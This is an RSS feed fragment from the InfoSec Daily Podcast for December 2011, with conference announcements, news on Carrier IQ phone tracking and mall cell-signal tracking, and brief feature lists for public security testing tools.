	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://thehackernews.com/2011/12/voodoo-carrier-iq-detector-application.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">thehackernews.com/2011/12/voodoo-carrier-iq-detector-application.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An Android developer recently</span><a href="http://thehackernews.com/2011/11/your-android-phone-is-spying-on-you-use.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">discovered</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a clandestine application called Carrier IQ built into most smartphones that doesn&#39;t just track your location; it secretly records your keystrokes, and there&#39;s nothing you can do about it. A new Android app to identify whether your smartphone has any Carrier IQ tracking/monitoring software installed on it has been released, the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Voodoo Carrier IQ detector</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, giving users a simple way to put their minds to rest on privacy. The handiwork of Android app developer supercurio, the tool is only a few hours old and only partially finished, with the consequent warning that the results can&rsquo;t be entirely relied on yet.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tool: </span><a href="http://voiphopper.sourceforge.net/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://voiphopper.sourceforge.net/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VoIP Hopper is a VLAN Hop test tool but also a tool to test VoIP infrastructure security.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Features</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New &ldquo;Assessment&rdquo; mode: Interactive, menu driven command interface, improves ability to VLAN Hop in Pentesting when the security tester is working against an unknown networkinfrastructure</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New VLAN Discovery methods (802.1q ARP, LLDP-MED)</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LLDP-MED spoofing and sniffing support</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Can bypass VoIP VLAN subnets that have DHCP disabled, and spoof the IP address and MAC address of a phone by setting a static IP</span></li>
</ul>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Support for injections using Mysql, SQL Server, Postgres and Oracle databases.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Command line interface. Different commands trigger different actions.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Auto-completion for commands, command arguments and database, table and columns names.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Developed in python 3.</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-536-ciq-detector-voip-hopper-playbook-safe-browsing-yahoo-0-day-legal-piracy-the-mole-certified-paycut/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3224/0/infosec-daily-podcast-episode-536.mp3" length="24146274" type="audio/mpeg" />
		<itunes:duration>0:50:15</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 536 for December 2, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) 
	We all know and lov[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 536 for December 2, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) 
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code: 
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Second round of tickets sold out!
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012 
	When: May 21-25, 2012 
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: thehackernews.com/2011/12/voodoo-carrier-iq-detector-application.html
	An Android developer recently discovered a clandestine application called Carrier IQ built into most smartphones that doesn&#39;t just track your location; it secretly records your keystrokes, and there&#39;s nothing you can do about it. A new Android app to identify whether your smartphone has any Carrier IQ tracking/monitoring software installed on it has been released, the Voodoo Carrier IQ detector, giving users a simple way to put their minds to rest on privacy. The handiwork of Android app developer supercurio, the tool is only a few hours old and only partially finished, with the consequent warning that the results can&#8217;t be entirely relied on yet.

	Tool: http://voiphopper.sourceforge.net/
	VoIP Hopper is a VLAN Hop test tool but also a tool to test VoIP infrastructure security.
	New Features

New &#8220;Assessment&#8221; mode: Interactive, menu driven command interface, improves ability to VLAN Hop in Pentesting when the security tester is working against an unknown networkinfrastructure
New VLAN Discovery methods (802.1q ARP, LLDP-MED)
LLDP-MED spoofing and sniffing support
Can bypass VoIP VLAN subnets that have DHCP disabled, and spoof the IP address and MAC address of a phone by setting a static IP


Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
Command line interface. Different commands trigger different actions.
Auto-completion for commands, command arguments and database, table and columns names.
Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
Developed in python 3.
</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 535 &#8211; cIQiOS, Mall Tracking Abandoned, Chrome Takeover, Water Pump Follow Up, Tea &amp; TeaMP0isoN</title>
		<link>http://www.isdpodcast.com/episode-535-ciqios-mall-tracking-abandoned-chrome-takeover-water-pump-follow-up-tea-teamp0ison</link>
		<comments>http://www.isdpodcast.com/episode-535-ciqios-mall-tracking-abandoned-chrome-takeover-water-pump-follow-up-tea-teamp0ison#comments</comments>
		<pubDate>Fri, 02 Dec 2011 01:47:29 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3220</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 535 for December 1, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 535 for December 1, 2011. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: </span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The call for papers is open</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://gizmodo.com/5864107/yes-your-iphone-is-tracking-you-with-carrieriq-too"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://gizmodo.com/5864107/yes-your-iphone-is-tracking-you-with-carrieriq-too</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">All hell broke loose yesterday when it was discovered that most (</span><a href="http://gizmodo.com/5864116/these-are-the-phones-were-pretty-sure-dont-have-carrier-iq?tag=stopspying"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">but not all</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) Android phones (and BlackBerries, and others) are recording every keystroke you make. Now, references to the same software have been discovered in Apple&#39;s iOS. But in this case, it only logs technical data and it&#39;s off by default.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last night, prominent iOS hacker chpwn tweeted that he had found reference to the same, now notorious Carrier IQ software in iOS 3. After just a little more poking and prodding, it was confirmed that these references exist all the way up to modern day iOS 5, they&#39;re just under a different name: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">/usr/bin/awd_ice2</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. But wait, before everyone starts returning their iPhones (none of you were going to do that anyway), there&#39;s a bit of good news.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seems that the data Carrier IQ has access to is much more limited than it is on Android. From chpwn&#39;s blog: &quot;&#8230;it does not appear the daemon has any access or communication with the UI layer, where text entry is done.&quot; That is extremely good news if it proves to be true, because it would mean that iOS wouldn&#39;t be logging your passwords, emails, SMS messages, etc. Even more good news: CarrierIQ only kicks in when the iPhone is in Diagnostic Mode, which is off by default. So you&#39;d have to actively tinker with settings you never use for it to work.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When activated, though, CarrierIQ does appear to log your name, phone number, carrier information, some info about the calls you are making, and your location (if Location Services are enabled). There may well be more, they just haven&#39;t found it yet. We&#39;ll update as we learn more.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.wired.com/epicenter/2011/11/mall-pull-plug-cell-tracking/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/epicenter/2011/11/mall-pull-plug-cell-tracking/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You may now shop two malls again without fear of individualized tracking&mdash;at least by your cell phone signal. Privacy concerns raised by US Senator Charles Schumer (D-NY) have ended plans by malls in southern California and Virginia to &ldquo;survey&rdquo; customers&rsquo; shopping habits by tracking their cell phone signals.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As Ars Technica previously reported, Forest City, the mall developer that owns and operates the Promenade Temecula in Temecula, California and Short Pump Town Center in Richmond, Virginia had announced it would test technology in those two malls from Path Intelligence. Called Footpath, the system uses a series of cellular signal detectors to triangulate the movement of customers&rsquo; phones &mdash; and by extension, the customers themselves &mdash; through the mall&rsquo;s stores and other spaces. While the technology doesn&rsquo;t eavesdrop on cell phone users&rsquo; calls or record information about their phone numbers, it does use their cellular device&rsquo;s digital signature to track individuals.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The collected information is stored on Path Intelligence&rsquo;s servers, and made available through a secure Web portal to mall owners, providing them with a way of profiling which stores customers visit and where foot traffic &ldquo;hot spots&rdquo; are for those demographics to optimize display advertising and other marketing.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Forest City had planned to conduct the trial until the end of December. However, just a day after the trial began, Sen. Schumer contacted Forest City to raise his concerns. In a press conference on Sunday, Schumer said that the malls should have allowed customers to opt into the survey, rather than having to &ldquo;opt out&rdquo; by turning off their cell phones. &ldquo;A shopper&rsquo;s personal cell phone should not be used by a third party as a tracking device by retailers,&rdquo; Schumer said in a press conference on Sunday. &ldquo;Personal cell phones are just that &mdash; personal. If retailers want to tap into your phone to see what your shopping patterns are, they can ask you for your permission to do so.&rdquo;</span></p>
